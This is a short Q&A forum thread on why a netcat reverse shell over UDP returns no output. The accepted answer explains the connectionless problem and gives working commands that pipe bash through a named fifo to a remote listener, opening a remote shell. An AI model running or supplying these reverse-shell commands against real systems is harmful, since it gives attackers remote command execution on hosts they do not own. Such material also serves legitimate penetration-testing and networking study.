# Obtain reverse shell over UDP with netcat

Tags: shell, udp, netcat

I want to get a reverse shell over UDP using netcat. Netcat by default sends traffic over TCP, so in order to send it over UDP I run the `-u` option like this:

Host 1:

```
nc.traditional -l -p 4444 -v -u
```

Host 2:

```
nc.traditional localhost 4444 -e /bin/bash -u
```

But when I type a bash command I do not get the output. Why is that?

Answer (score 2, accepted):

There are several problems with this:

1. You use `localhost` on Host 2. This is a special hostname that refers to the current host, not to Host 1.
2. UDP has no connections. Host 1 won't know where to send packets if it doesn't receive a message first.
3. `bash` reads input character by character, which doesn't work well with non-stream packet based data.

You can instead connect `nc` and `bash` with streams, and then send an immediate packet so that Host 1 will know where to send the commands you enter:

Host1:

```
nc.traditional -l -p 4444 -v -u
```

Host 2:

```
mkfifo fifo
nc.traditional -u host1 4444 < fifo |
{ 
  echo "Hi"
  bash
} > fifo
```

Comment: Thank you so much for your answer

Comment: Is there a way to put sshd inside of ncat, instead of bash?